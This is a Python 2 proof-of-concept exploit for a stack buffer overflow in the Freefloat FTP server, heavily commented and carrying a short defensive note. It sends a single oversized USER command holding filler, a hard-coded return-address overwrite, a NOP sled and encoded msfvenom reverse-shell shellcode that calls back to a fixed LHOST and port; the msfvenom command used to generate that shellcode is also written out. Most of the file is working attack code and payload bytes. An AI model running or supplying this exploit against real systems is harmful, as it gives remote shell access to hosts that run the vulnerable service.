Freefloat FTP server buffer overflow exploit
#!/usr/bin/env python2
"""Proof-of-concept for a stack buffer overflow in the Freefloat FTP server.

The script connects to the target FTP service, prints the greeting it receives,
and sends a single USER command whose argument is an oversized buffer made of
filler, a fixed return-address overwrite, a short NOP sled and an
msfvenom-generated reverse-shell payload.

Python 2 only: the buffer is a ``str`` holding raw bytes and is handed straight
to ``socket.send``; Python 3 would refuse a ``str`` there.

Defensive notes (for anyone triaging this traffic or hardening the host): on the
wire this is one FTP USER command several hundred bytes long that contains
non-printable bytes and a run of 0x90, which a length limit on FTP command
arguments or an IDS rule for oversized USER arguments will flag. The return
address is hard-coded, so it presumably depends on a module loading at a fixed
base on the tested host; the real fix is patching or retiring the vulnerable
service.
"""
import socket
import sys

# ============================================
# [!] Freefloat FTP server Buffer Overflow Exploit
# [+] Tested on Windows 7
# ============================================

# Usage check only covers the no-argument case: with <ip> but no <port>
# (len(sys.argv) == 2) the script proceeds and raises IndexError at
# sys.argv[2] below.
if len(sys.argv) == 1:
    print("Usage: {script} <ip> <port>".format(script=sys.argv[0]))
    sys.exit()

# Byte values the payload must not contain; the msfvenom command below was
# given the same list via -b. Presumably NUL and CR/LF act as terminators in
# the FTP command parser. Assigned here but not referenced afterwards.
badchars = "\x00\x0a\x0d"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread LHOST=192.168.13.132 LPORT=4444 -f python -b \x00\x0a\x0d -e x86/shikata_ga_nai --smallest
# Reverse shell that calls back to the LHOST/LPORT baked in by the command
# above. It is encoded with x86/shikata_ga_nai, so these bytes are not the
# plain payload and are opaque without decoding.
shellcode = ""
shellcode += "\xda\xd5\xbb\xd3\x95\x7b\xe6\xd9\x74\x24\xf4\x5a\x31"
shellcode += "\xc9\xb1\x52\x31\x5a\x17\x83\xea\xfc\x03\x89\x86\x99"
shellcode += "\x13\xd1\x41\xdf\xdc\x29\x92\x80\x55\xcc\xa3\x80\x02"
shellcode += "\x85\x94\x30\x40\xcb\x18\xba\x04\xff\xab\xce\x80\xf0"
shellcode += "\x1c\x64\xf7\x3f\x9c\xd5\xcb\x5e\x1e\x24\x18\x80\x1f"
shellcode += "\xe7\x6d\xc1\x58\x1a\x9f\x93\x31\x50\x32\x03\x35\x2c"
shellcode += "\x8f\xa8\x05\xa0\x97\x4d\xdd\xc3\xb6\xc0\x55\x9a\x18"
shellcode += "\xe3\xba\x96\x10\xfb\xdf\x93\xeb\x70\x2b\x6f\xea\x50"
shellcode += "\x65\x90\x41\x9d\x49\x63\x9b\xda\x6e\x9c\xee\x12\x8d"
shellcode += "\x21\xe9\xe1\xef\xfd\x7c\xf1\x48\x75\x26\xdd\x69\x5a"
shellcode += "\xb1\x96\x66\x17\xb5\xf0\x6a\xa6\x1a\x8b\x97\x23\x9d"
shellcode += "\x5b\x1e\x77\xba\x7f\x7a\x23\xa3\x26\x26\x82\xdc\x38"
shellcode += "\x89\x7b\x79\x33\x24\x6f\xf0\x1e\x21\x5c\x39\xa0\xb1"
shellcode += "\xca\x4a\xd3\x83\x55\xe1\x7b\xa8\x1e\x2f\x7c\xcf\x34"
shellcode += "\x97\x12\x2e\xb7\xe8\x3b\xf5\xe3\xb8\x53\xdc\x8b\x52"
shellcode += "\xa3\xe1\x59\xf4\xf3\x4d\x32\xb5\xa3\x2d\xe2\x5d\xa9"
shellcode += "\xa1\xdd\x7e\xd2\x6b\x76\x14\x29\xfc\xb9\x41\x3c\x78"
shellcode += "\x51\x90\x3e\x91\xfe\x1d\xd8\xfb\xee\x4b\x73\x94\x97"
shellcode += "\xd1\x0f\x05\x57\xcc\x6a\x05\xd3\xe3\x8b\xc8\x14\x89"
shellcode += "\x9f\xbd\xd4\xc4\xfd\x68\xea\xf2\x69\xf6\x79\x99\x69"
shellcode += "\x71\x62\x36\x3e\xd6\x54\x4f\xaa\xca\xcf\xf9\xc8\x16"
shellcode += "\x89\xc2\x48\xcd\x6a\xcc\x51\x80\xd7\xea\x41\x5c\xd7"
shellcode += "\xb6\x35\x30\x8e\x60\xe3\xf6\x78\xc3\x5d\xa1\xd7\x8d"
shellcode += "\x09\x34\x14\x0e\x4f\x39\x71\xf8\xaf\x88\x2c\xbd\xd0"
shellcode += "\x25\xb9\x49\xa9\x5b\x59\xb5\x60\xd8\x79\x54\xa0\x15"
shellcode += "\x12\xc1\x21\x94\x7f\xf2\x9c\xdb\x79\x71\x14\xa4\x7d"
shellcode += "\x69\x5d\xa1\x3a\x2d\x8e\xdb\x53\xd8\xb0\x48\x53\xc9"

# Little-endian encoding of the address 0x761CB503 that replaces the saved
# return address. Being a fixed value, it is specific to the tested host.
eip = "\x03\xB5\x1C\x76" # 761CB503
# Layout: 230 bytes of filler, the return-address overwrite, a 20-byte NOP
# sled, then the encoded payload. The total length is printed before sending.
buffer = "A" * 230 + eip + "\x90" * 20 + shellcode
host = sys.argv[1]
port = int(sys.argv[2])
s.settimeout(5)  # seconds; applies to connect, recv and send below
try:
    print("[+] Connecting to {host}:{port}".format(host=host,port=port))
    s.connect((host, port))
    data = s.recv(1024)  # the server's greeting banner, echoed unmodified
    print(data)
    print("[+] Sending payload...")
    print("[+] Payload buffer size is {buffer} chars".format(buffer=len(buffer)))
    # The entire overflow travels as the argument of one USER command.
    s.send("USER {buffer} \r\n".format(buffer=buffer))
    print("\n[+] Payload has been delivered!")
    s.close()
except Exception as e:
    # Broad catch so any network failure is reported instead of a traceback.
    # Note the socket is not closed on this path.
    print("[-] Could not send send payload to host. Error: {e}".format(e=e))